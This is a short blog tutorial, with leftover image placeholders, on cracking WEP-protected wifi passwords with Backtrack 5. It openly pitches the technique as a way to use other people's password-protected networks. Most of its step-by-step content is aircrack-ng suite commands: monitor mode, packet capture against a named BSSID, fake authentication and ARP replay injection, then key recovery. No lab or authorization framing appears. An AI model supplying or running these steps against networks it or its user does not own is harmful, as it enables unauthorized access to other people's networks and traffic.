how to crack wifi password

HOW TO CRACK WIFI PASSWORD USING BACKTRACK 5

wifi-hacking

In present world, we all are dealing with modern technology, Wifi is also one of them. Wifi connections are available everywhere i.e school, college, Office even at our home also. But at a same time we all are facing with one of the problem i.e every Wifi is password protected, and we are unable to use all wifi. We can use only those wifi whose connection is open or whose password we know it. So don’t worry my friends I will show you how to crack wifi password using Backtrack 5.

First of all I want to say what is WEP Cracking…

WEP  Cracking

WEP stands for Wireless Equivalent Privacy.

In WEP Cracking first all the hacker needs to capture sample packets not intended for his own network interface and then run crack program to compare testing keys against WEP key bundled with captured packets in attempt of decryption. After that the hacker found the key the he decrypted the key using decrypted tools.

 

Now follows these steps to crack the WEP Wifi key…

Step 1 :- Turn on Monitor mode

 airmon-ng

 airmon-ng start wlan0
1

Step 2 :- # airodump-ng mon0

how to crack wifi password

 

how to crack wifi password

 

 Step 3 :-  # airodump-ng -w twan –c 11 –bssid C8:3A:35:2F:E7:30 mon0

4

 

 Step 4 :- aireplay-ng -1 0 –a C8:3A:35:2F:E7:30 mon0

5

 

Step 5 :- aireplay-ng -3 –b C8:3A:35:2F:E7:30 mon0

6

 

As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets are now stored in twan=02.cap file.

NOTE: do not stop capturing process as you do not know if current amount of captured packed is satisfactory to crack WEP key.

Step 6 :-  aircrack-ng twan-02.cap

7

 

Step 7 :- Finally we found the Key…

how to crack wifi password

1 thought on “HOW TO CRACK WIFI PASSWORD USING BACKTRACK 5

Leave a Reply

Your email address will not be published. Required fields are marked *